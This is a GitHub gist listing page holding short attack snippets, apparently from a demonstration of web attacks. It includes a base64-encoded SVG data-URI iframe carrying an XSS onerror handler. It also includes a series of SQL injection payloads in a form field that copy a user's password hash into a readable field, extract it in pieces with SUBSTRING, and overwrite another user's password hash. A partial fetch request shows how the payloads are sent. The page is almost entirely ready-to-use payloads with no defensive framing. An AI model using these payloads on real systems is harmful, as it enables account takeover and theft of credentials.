Skip to content

Instantly share code, notes, and snippets.

David Gilbertson davidgilbertson

  • Sydney, Australia
Block or report user

Report or block davidgilbertson

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View iframe-with-xss
<iframe src="data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6Y29uc29sZS5sb2coJ1NVQ0NFU1M6IFNWRyBYU1MgdmlhIGRhdGEgVVJJJykiIC8+Cjwvc3ZnPg=="></iframe>
View 10.js
{
// ...
body: `email=no', surname = salt WHERE username = 'myemail@email.com'; #`
}
View 9.js
{
// ...
body: `email=no', password = '00fcdde26dd77af7858a52e3913e6f3330a32b3121a61bce915cc6145fc44453' WHERE username = 'user-two@email.com'; #`
}
View 8.js
{
// ...
body: `email=no', surname = SUBSTRING(password, 30, 1000) WHERE username = 'me@email.com'; #`
}
View 7.js
{
// ...
body: `email=no', password = '00fcdde26dd77af7858a52e3913e6f3330a32b31' WHERE username = 'user-two@email.com'; #`
}
View 6.js
{
// ...
body: `email=no', surname = 'WOOT!!' WHERE username = 'user-two@email.com'; #`
}
View 5.js
{
// ...
body: `email=no', surname = password WHERE username = 'me@email.com'; #`
}
View 4.js
{
// ...
body: `email=no', lastName='testing`
}
View 3.js
fetch('https://blah.com/api/users', {
credentials: 'include',
headers: {
authorization: 'Bearer blah',
'content-type': 'application/x-www-form-urlencoded',
'sec-fetch-mode': 'cors',
'x-csrf-token': 'blah',
},
referrer: 'https://blah.com/blah',
referrerPolicy: 'no-referrer-when-downgrade',
View 4.sql
UPDATE users SET email = 'no', surname = password WHERE username = 'me@email.com'; # WHERE id = '1234'
You can’t perform that action at this time.